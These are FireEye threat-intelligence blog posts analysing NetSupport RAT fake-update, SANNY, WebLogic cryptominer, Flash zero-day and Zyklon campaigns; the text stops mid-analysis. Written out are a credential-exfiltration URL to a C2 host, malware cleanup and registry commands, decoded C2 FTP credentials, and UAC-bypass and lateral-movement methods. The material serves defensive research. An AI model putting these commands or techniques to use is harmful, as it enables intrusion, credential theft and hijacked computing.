5 April 2018 at 15:00

Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT). NetSupport Manager is a commercially available RAT that can be used legitimately by system administrators for remotely accessing client computers. However, malicious actors are abusing this application by installing it to the victims’ systems without their knowledge to gain unauthorized access to their machines. This blog details our analysis of the JavaScript and components used in instances where the identified payload was NetSupport RAT.

Infection Vector

The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and FireFox updates. When users navigate to the compromised website, the malicious JavaScript file is downloaded, mostly from a DropBox link. Before delivering the payload, the JavaScript sends basic system information to the server. After receiving further commands from the server, it then executes the final JavaScript to deliver the final payload. In our case, the JavaScript that delivers the payload is named Update.js, and it is executed from %AppData% with the help of wscript.exe. Figure 1 shows the infection flow.


Figure 1: Infection Flow

In-Depth Analysis of JavaScript

The initial JavaScript file contains multiple layers of obfuscation. Like other malicious scripts, the first layer has obfuscation that builds and executes the second layer as a new function. The second layer of the JavaScript contains the dec function, which is used to decrypt and execute more JavaScript code. Figure 2 shows a snapshot of the second layer.


Figure 2: Second Layer of Initial JavaScript File

In the second JavaScript file, the malware author uses a tricky method to make the analysis harder for reverse engineers. The author uses the caller and callee function code to get the key for decryption. During normal JavaScript analysis, if an analyst finds any obfuscated script, the analyst tries to de-obfuscate or beautify the script for analysis. JavaScript beautification tools generally add line breaks and tabs to make the script code look better and easier to analyze. The tools also try to rename the local variables and remove unreferenced variables and code from the script, which helps to analyze core code only.

But in this case, since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception. The code snippet in Figure 3 shows this trick.


Figure 3: Anti-Analysis Trick Implemented in JavaScript (Beautified Code)

The code decrypts and executes the JavaScript code as a function. This decrypted function contains code that initiates the network connection. In the decoded function, the command and control (C2) URL and a value named tid are hard-coded in the script and protected with some encoded function.

During its first communication to the server, the malware sends the tid value and the current date of the system in encoded format, and waits for the response from the server. It decodes the server response and executes the response as a function, as shown in Figure 4.


Figure 4: Initial Server Communication and Response

The response from the server is JavaScript code that the malware executes as a function named step2.

The step2 function uses WScript.Network and Windows Management Instrumentation(WMI) to collect the following system information, which it then encodes and sends to the server:

Architecture, ComputerName, UserName, Processors, OS, Domain, Manufacturer, Model, BIOS_Version, AntiSpywareProduct, AntiVirusProduct, MACAddress, Keyboard, PointingDevice, DisplayControllerConfiguration, ProcessList;

After sending the system information to the server, the response from the server contains two parts: content2 and content3.

The script (step2 function) decodes both parts. The decoded content3 part contains the function named as step3, as shown in Figure 5.


Figure 5: Decrypting and Executing Response step3

The step3 function contains code that writes decoded content2 into a %temp% directory as Update.js. Update.js contains code to download and execute the final payload. The step3 function also sends the resulting data, such as runFileResult and _tempFilePath, to the server, as shown in Figure 6.


Figure 6: Script to Drop and Execute Update.js

The Update.js file also contains multi-layer obfuscation. After decoding, the JavaScript contains code to drop multiple files in %AppData%, including a 7zip standalone executable (7za.exe), password-protected archive (Loglist.rtf), and batch script (Upd.cmd). We will talk more about these components later.

JavaScript uses PowerShell commands to download the files from the server. It sets the attribute’s execution policy to bypass and window-style to hidden to hide itself from the end user.

Components of the Attack

Figure 7 shows the index of the malicious server where we have observed the malware author updating the script content.


Figure 7: Index of Malicious Server

  • 7za.exe: 7zip standalone executable
  • LogList.rtf: Password-protected archive file
  • Upd.cmd: Batch script to install the NetSupport Client
  • Downloads.txt: List of IPs (possibly the infected systems)
  • Get.php: Downloads LogList.rtf
Upd.cmd

This file is a batch script that extracts the archive file and installs the remote control tool on the system. The script is obfuscated with the variable substitution method. This file was regularly updated by the malware during our analysis.

After de-obfuscating the script, we can see the batch commands in the script (Figure 8).


Figure 8: De-Obfuscated Upd.cmd Script

The script performs the following tasks:

  1. Extract the archive using the 7zip executable with the password mentioned in the script.
  2. After extraction, delete the downloaded archive file (loglist.rtf).
  3. Disable Windows Error Reporting and App Compatibility.
  4. Add the remote control client executable to the firewall’s allowed program list.
  5. Run remote control tool (client32.exe).
  6. Add Run registry entry with the name “ManifestStore” or downloads shortcut file to Startup folder.
  7. Hide the files using attributes.
  8. Delete all the artifacts (7zip executable, script, archive file).

Note: While analyzing the script, we found some typos in the script (Figure 9). Yes, malware authors make mistakes too. This script might be in beta phase. In the later version of script, the author has removed these typos.


Figure 9: Registry Entry Bloopers

Artifact Cleaning

As mentioned, the script contains code to remove the artifacts used in the attack from the victim’s system. While monitoring the server, we also observed some change in the script related to this code, as shown in Figure 10.


Figure 10: Artifact Cleaning Commands

The highlighted command in one of the variants indicates that it might drop or use this file in the attack. The file could be a decoy document.

Persistence Mechanism

During our analysis, we observed two variants of this attack with different persistence mechanisms.

In the first variant, the malware author uses a RUN registry entry to remain persistent in the system.

In the second variant, the malware author uses the shortcut file (named desktop.ini.lnk), which is hosted on the server. It downloads the shortcut file and places it into the Startup folder, as shown in Figure 11.


Figure 11: Downloading Shortcut File

The target command for the shortcut file points to the remote application “client32.exe,” which was dropped in %AppData%, to start the application on startup.

LogList.rtf

Although the file extension is .rtf, the file is actually a 7zipped archive. This archive file is password-protected and contains the NetSupport Manager RAT. The script upd.cmd contains the password to extract the archive.

The major features provided by the NetSupport tool include:

  • Remote desktop
  • File transfer
  • Remote inventory and system information
  • Launching applications in client’s machine
  • Geolocation
Downloads.txt

This file contains a list of IP addresses, which could be compromised systems. It has IPs along with User-agent. The IP addresses in the file belong to various regions, mostly the U.S., Germany, and the Netherlands.

Conclusion

RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well.

The FireEye HX Endpoint platform successfully detects this attack at the initial phase of the attack cycle.

Acknowledgement

Thanks to my colleagues Dileep Kumar Jallepalli, Rakesh Sharma and Kimberly Goody for their help in the analysis.

Indicators of Compromise

Registry entries

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run :  ManifestStore

HKCU\Software\SeX\KEx

Files

%AppData%\ManifestStore\client32.exe

%AppData%\ManifestStore\client32.ini

%AppData%\ManifestStore\HTCTL32.DLL

%AppData%\ManifestStore\msvcr100.dll

%AppData%\ManifestStore\nskbfltr.inf

%AppData%\ManifestStore\NSM.ini

%AppData%\ManifestStore\NSM.LIC

%AppData%\ManifestStore\nsm_vpro.ini

%AppData%\ManifestStore\pcicapi.dll

%AppData%\ManifestStore\PCICHEK.DLL

%AppData%\ManifestStore\PCICL32.DLL

%AppData%\ManifestStore\remcmdstub.exe

%AppData%\ManifestStore\TCCTL32.DLL

%AppData%\systemupdate\Whitepaper.docx

Shortcut file

            %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk

Firewall program entry allowing the following application

            %AppData%\ManifestStore\client32.exe

Running process named “client32.exe” from the path “%AppData%\ManifestStore\client32.exe”

Hashes

The following hashes are JavaScript files that use the same obfuscation techniques described in the blog:

fc87951ae927d0fe5eb14027d43b1fc3

e3b0fd6c3c97355b7187c639ad9fb97a

a8e8b2072cbdf41f62e870ec775cb246

6c5fd3258f6eb2a7beaf1c69ee121b9f

31e7e9db74525b255f646baf2583c419

065ed6e04277925dcd6e0ff72c07b65a

12dd86b842a4d3fe067cdb38c3ef089a

350ae71bc3d9f0c1d7377fb4e737d2a4

c749321f56fce04ad8f4c3c31c7f33ff

c7abd2c0b7fd8c19e08fe2a228b021b9

b624735e02b49cfdd78df7542bf8e779

5a082bb45dbab012f17120135856c2fc

dc4bb711580e6b2fafa32353541a3f65

e57e4727100be6f3d243ae08011a18ae

9bf55bf8c2f4072883e01254cba973e6

20a6aa24e5586375c77b4dc1e00716f2

aa2a195d0581a78e01e62beabb03f5f0

99c7a56ba04c435372bea5484861cbf3

8c0d17d472589df4f597002d8f2ba487

227c634e563f256f396b4071ffda2e05

ef315aa749e2e33fc6df09d10ae6745d

341148a5ef714cf6cd98eb0801f07a01

SANNY Malware Delivery Method Updated in Recently Observed Attacks

23 March 2018 at 15:00

Introduction

In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.


Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).


Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.


Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:



  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:



  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip commands allows the attacker to migrate malware to a new FTP C2 server. The command has the following syntax: 



  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
  • /user command: This command will execute a command on the system as the logged in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command

Purpose

chip

Update the FTP server config file

pull

Upload a file from the machine

put

Copy an existing file to a new destination

/user

Create a new process with explorer.exe access token

default command

Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
  4. Reads the contents of temp.zip to memory.
  5. Deletes temp.zip from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:



  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:



  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:

Conclusion

This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash

Original Filename

b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4

РГНФ 2018-2019.doc

e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1

 

Copy of communication from Security Council Committee (1718).doc

eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f

1.bat

a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170

Setup.cab (64-bit)

a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113

Setup.cab (32-bit)

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

15 February 2018 at 16:30

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

By: FireEye
3 February 2018 at 02:15

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

17 January 2018 at 17:00

Introduction

FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Infection Vector

We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

The following industries have been the primary targets in this campaign:

  • Telecommunications
  • Insurance
  • Financial Services


Figure 1: Sample lure documents

Attack Flow

  1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
  2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
  3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.

A visual representation of the attack flow and execution chain can be seen in Figure 2.


Figure 2: Zyklon attack flow

Infection Techniques

CVE-2017-8759

This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


Figure 3: Embedded URL in OLE object

CVE-2017-11882

Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


Figure 4: Embedded URL in OLE object


Figure 5: HTTP GET request to download the next level payload

The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.


Figure 6: PowerShell command to download the Pause.ps1 payload

Dynamic Data Exchange (DDE)

Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


Figure 7: DDE technique used to download the Pause.ps1 payload

One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

Figure 8 shows the network communication of the Pause.ps1 download.


Figure 8: Network communication to download the Pause.ps1 payload

Zyklon Delivery

In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


Figure 9: Base64 decoded Pause.ps1

The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.


Figure 10: Network traffic to download final payload (words.exe)

Once executed, the file performs the following activities:

  1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
  2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
  3. The unpacked code is Zyklon.


Figure 11: XML configuration file to schedule the task

The Zyklon malware first retrieves the external IP address of the infected machine using the following:

  • api.ipify[.]org
  • ip.anysrc[.]net
  • myexternalip[.]com
  • whatsmyip[.]com

The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer.

Command & Control Communication

The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).


Figure 12: Zyklon public RSA key

After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

